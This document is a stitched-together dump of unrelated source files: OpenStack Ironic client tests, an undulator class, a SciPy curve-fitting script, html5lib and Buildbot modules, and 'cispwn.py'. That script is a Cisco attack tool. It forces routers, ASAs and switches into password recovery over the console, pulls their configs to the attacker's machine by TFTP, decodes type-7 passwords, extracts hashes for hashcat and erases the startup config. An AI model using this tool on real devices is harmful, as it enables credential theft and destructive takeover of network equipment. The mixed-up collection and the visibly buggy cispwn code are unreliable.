'os_auth_token': 'USER_AUTH_TOKEN',
}
client = iroclient.get_client('1', **kwargs)
self.assertEqual('USER_AUTH_TOKEN', client.http_client.auth_token)
self.assertEqual('http://ironic.example.org:6385/',
client.http_client.endpoint)
@mock.patch.object(filecache, 'retrieve_data', autospec=True)
@mock.patch.object(kaloading.session, 'Session', autospec=True)
@mock.patch.object(kaloading, 'get_plugin_loader', autospec=True)
def _test_get_client(self, mock_ks_loader, mock_ks_session,
mock_retrieve_data, version=None,
auth='password', **kwargs):
session = mock_ks_session.return_value.load_from_options.return_value
session.get_endpoint.return_value = 'http://localhost:6385/v1/f14b4123'
mock_ks_loader.return_value.load_from_options.return_value = 'auth'
mock_retrieve_data.return_value = version
client = iroclient.get_client('1', **kwargs)
mock_ks_loader.assert_called_once_with(auth)
mock_ks_session.return_value.load_from_options.assert_called_once_with(
auth='auth', timeout=kwargs.get('timeout'),
insecure=kwargs.get('insecure'), cert=kwargs.get('cert'),
cacert=kwargs.get('cacert'), key=kwargs.get('key'))
session.get_endpoint.assert_called_once_with(
service_type=kwargs.get('os_service_type') or 'baremetal',
interface=kwargs.get('os_endpoint_type') or 'publicURL',
region_name=kwargs.get('os_region_name'))
if 'os_ironic_api_version' in kwargs:
self.assertEqual(0, mock_retrieve_data.call_count)
else:
mock_retrieve_data.assert_called_once_with(
host='localhost',
port='6385')
self.assertEqual(version or v1.DEFAULT_VER,
client.http_client.os_ironic_api_version)
def test_get_client_no_auth_token(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
}
self._test_get_client(**kwargs)
def test_get_client_service_and_endpoint_type_defaults(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
'os_service_type': '',
'os_endpoint_type': ''
}
self._test_get_client(**kwargs)
def test_get_client_with_region_no_auth_token(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_region_name': 'REGIONONE',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
}
self._test_get_client(**kwargs)
def test_get_client_no_url(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': '',
}
self.assertRaises(exc.AmbiguousAuthSystem, iroclient.get_client,
'1', **kwargs)
# test the alias as well to ensure backwards compatibility
self.assertRaises(exc.AmbigiousAuthSystem, iroclient.get_client,
'1', **kwargs)
def test_get_client_incorrect_auth_params(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_auth_url': 'http://localhost:35357/v2.0',
}
self.assertRaises(exc.AmbiguousAuthSystem, iroclient.get_client,
'1', **kwargs)
def test_get_client_with_api_version_latest(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
'os_ironic_api_version': "latest",
}
self._test_get_client(**kwargs)
def test_get_client_with_api_version_numeric(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
'os_ironic_api_version': "1.4",
}
self._test_get_client(**kwargs)
def test_get_client_default_version_set_cached(self):
version = '1.3'
# Make sure we don't coincidentally succeed
self.assertNotEqual(v1.DEFAULT_VER, version)
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
}
self._test_get_client(version=version, **kwargs)
def test_get_client_with_auth_token(self):
kwargs = {
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': 'USER_AUTH_TOKEN',
}
self._test_get_client(auth='token', **kwargs)
def test_get_client_with_region_name_auth_token(self):
kwargs = {
'os_auth_url': 'http://localhost:35357/v2.0',
'os_region_name': 'REGIONONE',
'os_auth_token': 'USER_AUTH_TOKEN',
}
self._test_get_client(auth='token', **kwargs)
def test_get_client_only_session_passed(self):
session = mock.Mock()
session.get_endpoint.return_value = 'http://localhost:35357/v2.0'
kwargs = {
'session': session,
}
iroclient.get_client('1', **kwargs)
session.get_endpoint.assert_called_once_with(service_type='baremetal',
interface='publicURL',
region_name=None)
def test_get_client_incorrect_session_passed(self):
session = mock.Mock()
session.get_endpoint.side_effect = Exception('boo')
kwargs = {
'session': session,
}
self.assertRaises(exc.AmbiguousAuthSystem, iroclient.get_client,
'1', **kwargs)
@mock.patch.object(kaloading.session, 'Session', autospec=True)
@mock.patch.object(kaloading, 'get_plugin_loader', autospec=True)
def _test_loader_arguments_passed_correctly(
self, mock_ks_loader, mock_ks_session,
passed_kwargs, expected_kwargs):
session = mock_ks_session.return_value.load_from_options.return_value
session.get_endpoint.return_value = 'http://localhost:6385/v1/f14b4123'
mock_ks_loader.return_value.load_from_options.return_value = 'auth'
iroclient.get_client('1', **passed_kwargs)
mock_ks_loader.return_value.load_from_options.assert_called_once_with(
**expected_kwargs)
mock_ks_session.return_value.load_from_options.assert_called_once_with(
auth='auth', timeout=passed_kwargs.get('timeout'),
insecure=passed_kwargs.get('insecure'),
cert=passed_kwargs.get('cert'),
cacert=passed_kwargs.get('cacert'), key=passed_kwargs.get('key'))
session.get_endpoint.assert_called_once_with(
service_type=passed_kwargs.get('os_service_type') or 'baremetal',
interface=passed_kwargs.get('os_endpoint_type') or 'publicURL',
region_name=passed_kwargs.get('os_region_name'))
def test_loader_arguments_token(self):
passed_kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_auth_token': 'USER_AUTH_TOKEN',
}
expected_kwargs = {
'auth_url': 'http://localhost:35357/v3',
'project_id': None,
'project_name': None,
'user_domain_id': None,
'user_domain_name': None,
'project_domain_id': None,
'project_domain_name': None,
'token': 'USER_AUTH_TOKEN'
}
self._test_loader_arguments_passed_correctly(
passed_kwargs=passed_kwargs, expected_kwargs=expected_kwargs)
def test_loader_arguments_password_tenant_name(self):
passed_kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_tenant_name': 'TENANT',
'os_username': 'user',
'os_password': '1234',
'os_project_domain_id': 'DEFAULT',
'os_user_domain_id': 'DEFAULT'
}
expected_kwargs = {
'auth_url': 'http://localhost:35357/v3',
'project_id': None,
'project_name': 'TENANT',
'user_domain_id': 'DEFAULT',
'user_domain_name': None,
'project_domain_id': 'DEFAULT',
'project_domain_name': None,
'username': 'user',
'password': '1234'
}
self._test_loader_arguments_passed_correctly(
passed_kwargs=passed_kwargs, expected_kwargs=expected_kwargs)
def test_loader_arguments_password_project_id(self):
passed_kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_project_id': '1000',
'os_username': 'user',
'os_password': '1234',
'os_project_domain_name': 'domain1',
'os_user_domain_name': 'domain1'
}
expected_kwargs = {
'auth_url': 'http://localhost:35357/v3',
'project_id': '1000',
'project_name': None,
'user_domain_id': None,
'user_domain_name': 'domain1',
'project_domain_id': None,
'project_domain_name': 'domain1',
'username': 'user',
'password': '1234'
}
self._test_loader_arguments_passed_correctly(
passed_kwargs=passed_kwargs, expected_kwargs=expected_kwargs)
@mock.patch.object(iroclient, 'Client')
@mock.patch.object(kaloading.session, 'Session', autospec=True)
def test_correct_arguments_passed_to_client_constructor_noauth_mode(
self, mock_ks_session, mock_client):
kwargs = {
'ironic_url': 'http://ironic.example.org:6385/',
'os_auth_token': 'USER_AUTH_TOKEN',
'os_ironic_api_version': 'latest',
'insecure': True,
'max_retries': 10,
'retry_interval': 10,
'os_cacert': 'data'
}
iroclient.get_client('1', **kwargs)
mock_client.assert_called_once_with(
'1', 'http://ironic.example.org:6385/',
**{
'os_ironic_api_version': 'latest',
'max_retries': 10,
'retry_interval': 10,
'token': 'USER_AUTH_TOKEN',
'insecure': True,
'ca_file': 'data',
'cert_file': None,
'key_file': None,
'timeout': None,
'session': None
}
)
self.assertFalse(mock_ks_session.called)
@mock.patch.object(iroclient, 'Client')
@mock.patch.object(kaloading.session, 'Session', autospec=True)
def test_correct_arguments_passed_to_client_constructor_session_created(
self, mock_ks_session, mock_client):
session = mock_ks_session.return_value.load_from_options.return_value
kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_project_id': '1000',
'os_username': 'user',
'os_password': '1234',
'os_project_domain_name': 'domain1',
'os_user_domain_name': 'domain1'
}
iroclient.get_client('1', **kwargs)
mock_client.assert_called_once_with(
'1', session.get_endpoint.return_value,
**{
'os_ironic_api_version': None,
'max_retries': None,
'retry_interval': None,
'session': session,
}
)
@mock.patch.object(iroclient, 'Client')
@mock.patch.object(kaloading.session, 'Session', autospec=True)
def test_correct_arguments_passed_to_client_constructor_session_passed(
self, mock_ks_session, mock_client):
session = mock.Mock()
kwargs = {
'session': session,
}
iroclient.get_client('1', **kwargs)
mock_client.assert_called_once_with(
'1', session.get_endpoint.return_value,
**{
'os_ironic_api_version': None,
'max_retries': None,
'retry_interval': None,
'session': session,
}
)
self.assertFalse(mock_ks_session.called)
def test_safe_header_with_auth_token(self):
(name, value) = ('X-Auth-Token', u'3b640e2e64d946ac8f55615aff221dc1')
expected_header = (u'X-Auth-Token',
'{SHA1}6de9fb3b0b89099030a54abfeb468e7b1b1f0f2b')
client = http.HTTPClient('http://localhost/')
header_redact = client._process_header(name, value)
self.assertEqual(expected_header, header_redact)
def test_safe_header_with_no_auth_token(self):
name, value = ('Accept', 'application/json')
header = ('Accept', 'application/json')
client = http.HTTPClient('http://localhost/')
header_redact = client._process_header(name, value)
self.assertEqual(header, header_redact)
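# A usage sketch (illustrative, not part of the test module): the kwargs exercised above
# mirror a direct call such as
#   client = iroclient.get_client('1', os_auth_url='http://localhost:35357/v2.0',
#                                 os_username='USERNAME', os_password='PASSWORD',
#                                 os_tenant_name='TENANT_NAME')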
|
srio/BeamlineComponents
|
refs/heads/master
|
Source/UndulatorVertical.py
|
1
|
from BeamlineComponents.Source.Undulator import Undulator
class UndulatorVertical(Undulator):
def __init__(self,K , period_length, period_number):
Undulator.__init__(self,
K_vertical=K,
K_horizontal=0.0,
period_length=period_length,
periods_number=period_number)
    def K(self):
        return self.K_vertical()
def B(self):
return self._magneticFieldStrengthFromK(self.K())
|
dylup/cispwn
|
refs/heads/master
|
cispwn.py
|
1
|
#!/usr/bin/python
import serial
import sys
import getopt
import time
import os
import subprocess
version = 'Version 0.2'
tftp = 0
copied = 0
router = 0
switch = 0
asa = 0
passwords = 0
password = []
interface = []
password_list = []
ip_submask = subprocess.check_output("ifconfig")
routes = subprocess.check_output(['route', '-n'])
#ser = serial.Serial('/dev/ttyUSB0') # open serial port
#print (ser.name) # check which port was really used
#ser.close() # close
#test
#Upon power cycling, loops the command until the router boots with a blank config. It then enables higher priviledges for further commands to be run.
def rommon(console):
select = False
rom = False
global router
global asa
global switch
print "Attempting to identify device type"
while select == False:
prompt = read_serial(console)
print prompt
if 'Self decompressing the image' in prompt:
router = 1
switch = 0
asa = 0
select = True
print "Router selected"
elif 'rommon' in prompt:
asa = 1
switch = 0
router = 0
select = True
print "ASA Selected"
elif 'Use break or ESC to interrupt boot' in prompt or 'Launching BootLoader' in prompt or "seconds" in prompt:
asa = 1
switch = 0
router = 0
select = True
print "ASA Selected"
elif "Loading flash:/" in prompt:
switch = 1
router = 0
asa = 0
select = True
print "Switch selected"
else:
print "Error, a type could not be identified. This script will wait for 5 seconds and loop again."
time.sleep(5)
while rom == False:
#Checks if the config has already been loaded
if router == 1:
if "Press RETURN" in prompt:
print "Power cycle the router again. This script will wait for 10 seconds and loop again."
time.sleep(10)
#Sends the Ctrl+C to stop the boot and enter rommon
elif "Self decompressing the image" in prompt:
send_command(console, cmd = '\x03')
rom = True
print "rommon is ready"
elif "Continue with configuration dialog" in prompt:
print "Error: The router does not have a saved config"
sys.exit()
#Boots the router in recovery mode
send_command(console, cmd = 'confreg 2042')
send_command(console, cmd = 'boot')
print "Booting"
time.sleep(30)
send_command(console, cmd = 'no')
send_command(console, cmd = '')
send_command(console, cmd = 'enable')
elif asa == 1:
if "Reading from flash" in prompt or "Launching bootloader" in prompt:
print "Power cycle the ASA again. This script will wait for 10 seconds and loop again."
time.sleep(10)
prompt = read_serial(console)
else:
if rom == False:
send_command(console, cmd = '\x1B')
rom = True
print "rommon is ready"
time.sleep(5)
send_command(console, cmd = 'confreg 0x41')
time.sleep(15)
send_command(console, cmd = 'confreg')
send_command(console, cmd ='y')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = 'y')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
time.sleep(10)
send_command(console, cmd = 'boot')
print "Booting"
time.sleep(40)
send_command(console, cmd = 'no')
send_command(console, cmd = '')
send_command(console, cmd = 'enable')
send_command(console, cmd = '')
'''
elif switch == 1:
print "The switch must be manually reset by hand. Look online for instructions for your specific switch model. This script will loop until it detects the recovery mode"
recovery = False
while recovery == False:
#if statement for switch prompt goes here
'''
#sets IP settings of the router's interface
def tftp_setup(console):
global router
global asa
global switch
global tftp
if router == 1:
send_command(console, cmd = 'config t')
send_command(console, cmd = 'do show ip int brief')
send_command(console, cmd = '\40')
send_command(console, cmd = '\40')
send_command(console, cmd = '\40')
prompt = read_serial(console)
#Checks whether a Gigabit interface is available, if not, it defaults to the first FastEthernet interface.
print "Setting interface options"
if "GigabitEthernet0/0" in prompt:
send_command(console, cmd = 'interface Gig0/0')
else:
send_command(console, cmd = 'interface Fa0/0')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'ip addr 192.168.1.1 255.255.255.0')
send_command(console, cmd = '\x03')
send_command(console, cmd = '')
print "Interface options set"
tftp = 1
elif asa == 1:
send_command(console, cmd = 'config t')
print "Setting interface options"
send_command(console, cmd = 'int vlan 1')
send_command(console, cmd = 'ip addr 192.168.1.1 255.255.255.0')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'security-level 0')
send_command(console, cmd = 'nameif inside')
send_command(console, cmd = 'int Eth 0/0')
send_command(console, cmd = 'switchport mode access')
send_command(console, cmd = 'switchport access vlan 1')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'exit')
send_command(console, cmd = 'exit')
send_command(console, cmd = '')
print "Interface options set"
tftp = 1
elif switch == 1:
send_command(console, cmd= 'config t')
print "Setting interface options"
send_command(console, cmd = 'int vlan 1')
send_command(console, cmd = 'ip addr 192.168.1.1 255.255.255.0')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'do sh ip int br')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
#Checks whether a Gigabit interface is available, if not, it defaults to the first FastEthernet interface.
prompt=read_serial(console)
if "GigabitEthernet" in prompt:
send_command(console, cmd = 'interface Gig0/1')
else:
send_command(console, cmd = 'interface Fa0/1')
send_command(console, cmd = 'switch mode access')
send_command(console, cmd = 'switch access vlan 1')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'exit')
send_command(console, cmd = 'exit')
send_command(console, cmd = '')
subprocess.check_call(['ping','-c3','192.168.1.1'])
time.sleep(5)
print "Interface options set"
tftp = 1
def copy_config(console):
#tftp the config file to the host machine for further commands
global tftp
global copied
print tftp
if tftp == 0:
tftp_setup(console)
send_command(console, cmd = 'copy run start')
send_command(console, cmd = '')
send_command(console, cmd = 'copy startup-config tftp:')
send_command(console, cmd = '192.168.1.2')
send_command(console, cmd = 'cispwn-config.txt')
copied = 1
def crack_password(password):
plaintext = ''
xlat = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
i = 2
val = 0
seed = (ord(password[0]) - 0x30) * 10 + ord(password[1]) - 0x30
while i < len(password):
if (i != 2 and not(i & 1)):
plaintext += chr(val ^ ord(xlat[seed]))
seed += 1
seed %= len(xlat)
val = 0
val *= 16
c = password[i]
if(c.isdigit()):
val += ord(password[i]) - 0x30
if(ord(password[i]) >= 0x41 and ord(password[i]) <= 0x46):
val += ord(password[i]) - 0x41 + 0x0a
i += 1
plaintext += chr(val ^ ord(xlat[seed]))
return plaintext
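# Worked example of the reversal above (assumption: test vector derived by hand from the
# xlat table, not taken from the original script). The first two digits of a type-7 string
# are the decimal seed; each following hex byte is XORed against xlat starting at that seed:
#   crack_password("00071A150754")  # -> "cisco"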
def decrypt_level7_passwords(console):
global copied
global router
global switch
global password_list
global passwords
global asa
if copied == 0:
		copy_config(console)
config = open ('/srv/tftp/cispwn-config.txt', 'r')
#and parse the file for cisco 7 passwords, then crack them and display them in plaintext
	if router == 1 or switch == 1:
		prevline = ""
		for line in config:
			if "password 7 " in line:
				line = line.replace("password 7 ", "")
				password.append(line)
				passwords += 1
				interface.append(prevline)
			prevline = line
i = 0
while i < passwords:
cracked = crack_password(password[i])
password[i] = cracked
i += 1
i = 0
txt = open("passwords.txt", "w")
while i < passwords:
		password_list.append(interface[i] + ":" + password[i])
txt.write("%s\n" % password_list[i])
i += 1
txt.close()
print("The passwords and interfaces will be located in the passwords.txt file")
def hash_grab(console):
global switch
global router
	global asa
	global password, passwords
	config = open('/srv/tftp/cispwn-config.txt', 'r')
	if asa == 1:
		#grab the hash, store in file, tell user to crack manually/bruteforce
		for line in config:
if "password ":
if "username":
line = line.replace("username ", "")
line = line.replace(" password ",":")
line = line.replace(" encrypted","")
password.append(line)
passwords += 1
elif "enable password":
line = line.replace("enable password ", "")
line = line.replace(" encrypted", "")
txt2 = open("asa_host_hash.txt", "w")
txt.write("%s\n" % line)
i = 0
txt = open("asa_hash.txt", "w")
while i < passwords:
txt.write("%s\n" % password[i])
i += 1
txt.close()
print("The hashes will be located in the asa_hash.txt file, use hashcat to crack these. The hash type will be specified in the README")
elif switch == 1 or router == 1:
for line in config:
if "secret 5":
if "enable":
line = line.replace("enable secret 5 ","enable:")
passwords.append(line)
passwords += 1
else:
line = line.replace("username ","")
line = line.replace(" secret 5 ",":")
password.append(line)
passwords += 1
if switch == 1:
txt = open("switch_hash.txt", "w")
while i < passwords:
txt.write("%s\n" % password[i])
i += 1
txt.close()
print("The hashes will be located in the switch_hash.txt file, use hashcat to crack these. The hash type will be type 500.")
else:
txt = open("router_hash.txt", "w")
while i < passwords:
txt.write("%s\n" % password[i])
i += 1
txt.close()
print("The hashes will be located in the router_hash.txt file, use hashcat to crack these. The hash type will be type 500.")
def delete_config(console):
#delete the startup config file
if router == 1:
send_command(console, cmd = 'erase startup-config')
send_command(console, cmd = '')
print "config was deleted"
elif asa == 1:
send_command(console, cmd = 'write erase')
send_command(console, cmd = '')
print "config was deleted"
elif switch == 1:
send_command(console, cmd = 'write erase')
send_command(console, cmd = '')
print "config was deleted"
def ip_check():
global ip_submask
	global routes
	if not "inet addr:192.168.1.2" in ip_submask or not "Mask:255.255.255.0" in ip_submask or not "0.0.0.0 192.168.1.1" in routes:
print 'Error, your network interface settings are incorrect'
sys.exit()
def console_grab():
return ""
#def brick_device(console):
#deletes every system image on the device, requires external image to get it working again.
def read_serial(console):
#Checks to see if there are bytes waiting to be read, and reads them. If no bytes are found, it returns a null string.
data_bytes = console.inWaiting()
if data_bytes:
return console.read(data_bytes)
else:
return ""
#might remove reading portion for less output to screen
def send_command(console,cmd = ''):
#Sends a command to the router and returns the bytes in waiting as output.
console.write(cmd+'\n')
time.sleep(2)
print read_serial(console)
def main(argv):
try:
opts, args = getopt.getopt(argv, "hV", ['help',
'version'])
except getopt.GetoptError:
print 'Usage: ./cispwn.py <args>'
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print 'Usage: ./cispwn.py\n'
print 'Arguments:'
print '\t-V or --version\t\tShow version info'
print '\t-h or --help\t\tShow this screen'
sys.exit()
if opt in ('-V', '--version'):
print 'cispwn.py ' + version
sys.exit()
#grab specific usb port based on dev script
'''console=serial.Serial(
port = '/dev/ttyUSB0',
baudrate = 9600,
parity = "N",
stopbits = 1,
bytesize = 8,
timeout = 8
)
if not console.isOpen():
print 'Error, a connection could not be made'
sys.exit()'''
#check if IP address/subnet mask match using netifaces, if not, exit the program
ip_check()
#Function for entering rommon goes here
rommon(console)
copy_config(console)
decrypt_level7_passwords(console)
delete_config(console)
if __name__ == "__main__":
main(sys.argv[1:])
|
PongPi/isl-odoo
|
refs/heads/8.0
|
addons/web_linkedin/__init__.py
|
442
|
import web_linkedin
|
jeezybrick/django
|
refs/heads/master
|
tests/model_meta/__init__.py
|
12133432
| |
Gagaro/django
|
refs/heads/master
|
tests/gis_tests/geoadmin/__init__.py
|
12133432
| |
google/slo-generator
|
refs/heads/master
|
samples/custom/__init__.py
|
12133432
| |
jbking/demo-appengine-django-golang
|
refs/heads/master
|
myproject/django/conf/locale/he/__init__.py
|
12133432
| |
AstroFloyd/LearningPython
|
refs/heads/master
|
Fitting/scipy.optimize.least_squares_2_loss.py
|
1
|
#!/bin/env python3
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.least_squares.html
"""Solve a curve fitting problem using robust loss function to take care of outliers in the data. Define the
model function as y = a + b * exp(c * t), where t is a predictor variable, y is an observation and a, b, c are
parameters to estimate. Use different 'loss functions'.
"""
import numpy as np
from scipy.optimize import least_squares
# Function which generates the data with noise and outliers:
def gen_data(t, a, b, c, noise=0, n_outliers=0, random_state=0):
y = a + b * np.exp(t * c)
rnd = np.random.RandomState(random_state)
error = noise * rnd.randn(t.size)
outliers = rnd.randint(0, t.size, n_outliers)
error[outliers] *= 10
return y + error
# Function for computing residuals:
def fun(x, t, y):
return x[0] + x[1] * np.exp(x[2] * t) - y
# Define the model parameters:
a = 0.5
b = 2.0
c = -1
t_min = 0
t_max = 10
n_points = 15
# Generate the data:
t_train = np.linspace(t_min, t_max, n_points)
y_train = gen_data(t_train, a, b, c, noise=0.1, n_outliers=3)
# Initial estimate of parameters:
x0 = np.array([1.0, 1.0, 0.0])
# Compute a standard least-squares solution:
res_lsq = least_squares(fun, x0, args=(t_train, y_train))
print('res_lsq: ', res_lsq)
# Now compute two solutions with two different robust loss functions. The parameter f_scale is set to 0.1,
# meaning that inlier residuals should not significantly exceed 0.1 (the noise level used):
res_soft_l1 = least_squares(fun, x0, loss='soft_l1', f_scale=0.1, args=(t_train, y_train))
print('res_soft_l1: ', res_soft_l1)
res_log = least_squares(fun, x0, loss='cauchy', f_scale=0.1, args=(t_train, y_train))
print('res_log: ', res_log)
# Plot all the curves. We see that by selecting an appropriate loss we can get estimates close to
# optimal even in the presence of strong outliers. But keep in mind that generally it is recommended to try
# 'soft_l1' or 'huber' losses first (if at all necessary) as the other two options may cause difficulties in
# the optimization process.
t_test = np.linspace(t_min, t_max, n_points * 10)
y_true = gen_data(t_test, a, b, c)
y_lsq = gen_data(t_test, *res_lsq.x)
y_soft_l1 = gen_data(t_test, *res_soft_l1.x)
y_log = gen_data(t_test, *res_log.x)
import matplotlib.pyplot as plt
#plt.style.use('dark_background') # Invert colours
plt.plot(t_train, y_train, 'o')
plt.plot(t_test, y_true, 'k', linewidth=2, label='true')
plt.plot(t_test, y_lsq, label='linear loss')
plt.plot(t_test, y_soft_l1, label='soft_l1 loss')
plt.plot(t_test, y_log, label='cauchy loss')
plt.xlabel("t")
plt.ylabel("y")
plt.legend()
plt.tight_layout()
# plt.show()
plt.savefig('scipy.optimize.least_squares_2_loss.png') # Save the plot as png
plt.close() # Close the plot in order to start a new one later
print()
|
deandunbar/bitwave
|
refs/heads/master
|
hackathon_version/venv/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
|
1730
|
"""A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from ..utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
a xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
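# A minimal usage sketch (not part of the original module): look up a builder class by
# tree type and let the "etree" type fall back to the default ElementTree implementation.
#
#   dom_builder_cls = getTreeBuilder("dom")      # xml.dom.minidom-backed by default
#   etree_builder_cls = getTreeBuilder("etree")  # cElementTree if available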
|
denny820909/builder
|
refs/heads/master
|
lib/python2.7/site-packages/buildbot-0.8.8-py2.7.egg/buildbot/steps/source/svn.py
|
4
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import xml.dom.minidom
import xml.parsers.expat
from twisted.python import log
from twisted.internet import defer
from buildbot.process import buildstep
from buildbot.steps.source.base import Source
from buildbot.interfaces import BuildSlaveTooOldError
from buildbot.config import ConfigErrors
class SVN(Source):
"""I perform Subversion checkout/update operations."""
name = 'svn'
renderables = [ 'repourl' ]
possible_modes = ('incremental', 'full')
possible_methods = ('clean', 'fresh', 'clobber', 'copy', 'export', None)
def __init__(self, repourl=None, mode='incremental',
method=None, username=None,
password=None, extra_args=None, keep_on_purge=None,
depth=None, preferLastChangedRev=False, **kwargs):
self.repourl = repourl
self.username = username
self.password = password
self.extra_args = extra_args
self.keep_on_purge = keep_on_purge or []
self.depth = depth
self.method = method
self.mode = mode
self.preferLastChangedRev = preferLastChangedRev
Source.__init__(self, **kwargs)
errors = []
if self.mode not in self.possible_modes:
errors.append("mode %s is not one of %s" % (self.mode, self.possible_modes))
if self.method not in self.possible_methods:
errors.append("method %s is not one of %s" % (self.method, self.possible_methods))
if repourl is None:
errors.append("you must provide repourl")
if errors:
raise ConfigErrors(errors)
def startVC(self, branch, revision, patch):
self.revision = revision
self.method = self._getMethod()
self.stdio_log = self.addLogForRemoteCommands("stdio")
d = self.checkSvn()
def checkInstall(svnInstalled):
if not svnInstalled:
raise BuildSlaveTooOldError("SVN is not installed on slave")
return 0
d.addCallback(checkInstall)
if self.mode == 'full':
d.addCallback(self.full)
elif self.mode == 'incremental':
d.addCallback(self.incremental)
d.addCallback(self.parseGotRevision)
d.addCallback(self.finish)
d.addErrback(self.failed)
return d
@defer.inlineCallbacks
def full(self, _):
if self.method == 'clobber':
yield self.clobber()
return
elif self.method in ['copy', 'export']:
yield self.copy()
return
updatable = yield self._sourcedirIsUpdatable()
if not updatable:
# blow away the old (un-updatable) directory
yield self.runRmdir(self.workdir)
# then do a checkout
checkout_cmd = ['checkout', self.repourl, '.']
if self.revision:
checkout_cmd.extend(["--revision", str(self.revision)])
yield self._dovccmd(checkout_cmd)
elif self.method == 'clean':
yield self.clean()
elif self.method == 'fresh':
yield self.fresh()
@defer.inlineCallbacks
def incremental(self, _):
updatable = yield self._sourcedirIsUpdatable()
if not updatable:
# blow away the old (un-updatable) directory
yield self.runRmdir(self.workdir)
# and plan to do a checkout
command = ['checkout', self.repourl, '.']
else:
# otherwise, do an update
command = ['update']
if self.revision:
command.extend(['--revision', str(self.revision)])
yield self._dovccmd(command)
@defer.inlineCallbacks
def clobber(self):
yield self.runRmdir(self.workdir)
checkout_cmd = ['checkout', self.repourl, '.']
if self.revision:
checkout_cmd.extend(["--revision", str(self.revision)])
yield self._dovccmd(checkout_cmd)
def fresh(self):
d = self.purge(True)
cmd = ['update']
if self.revision:
cmd.extend(['--revision', str(self.revision)])
d.addCallback(lambda _: self._dovccmd(cmd))
return d
def clean(self):
d = self.purge(False)
